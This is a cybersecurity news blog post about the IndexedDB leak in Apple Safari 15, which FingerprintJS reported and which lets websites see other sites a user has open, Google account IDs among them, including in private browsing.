Home » Breaking Computer security Cyber Security data security Latest Cybersecurity News Mac security

A new Safari browser vulnerability allows Cross-Site User Tracking

John Greenwood Posted On January 16, 2022
0


Safari Browser Vulnerability

A software bug has been identified in Apple Safari 15, where the IndexedDB API can be manipulated by any malicious website tracking user activity when they are online. The vulnerability called as IndexedDB leaks was first disclosed by FingerprintJS who reported the bug to Apple on November 28th, 2021.

The IndexedDB is a preliminary JavaScript API offered by web browsers fro managing a NoSQL database of  data subject including files and blobs. The same-origin is a fundamental security mechanism which ensures that resources are retrieved from distinct origins. This will be a combo of host, scheme, and a port. By restricting how a script is loaded by one origin can interact with another origin resource, by manage malicious scripts and reduce any attack vectors by restricting malicious websites from running the arbitrary JS codes.

Safari browser vulnerability and the handling of indexedDB API

However in case of how the indexedDB API is handled in the Safari, as it is violating the same-origin policy. When a website communicates with a database, a new DB with the same name is created in all frames, tabs and windows within the same active browser instance.

The problem is that this privacy violation in Safari will allow websites to learn what other websites are open and are being visited by the user. This does include Google Services like YouTube and Google Calendar as they can own IndexedDB databases including the Google user IDs. an internal identifier mapping it to a Google Account.

Safari browser vulnerability

To make things worse, incognito isn’t an exception from this Safari browser vulnerability. Jake Archibald said in a tweet that this is a huge Safari browser vulnerability, Safari users should switch to different browser to avoid data leakage. However, it could apply only to desktops and laptops, while iOS users are left with no choice over browsers.

Subscribe to our newsletter for daily alerts on cyber events, you can also follow us on Facebook, Linkedin, Instagram, Twitter and Reddit.

You can reach out to us via Twitter or Facebook, for any advertising requests.

Share the article with your friends




Author

John Greenwood

He has been working with Cybersec and Infosec market for 12+ years now. Passionate about AI, Cybersecurity, Info security, Blockchain and Machine Learning. When he is not occupied with cybersecurity, he likes to go on bike rides!

Leave A Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.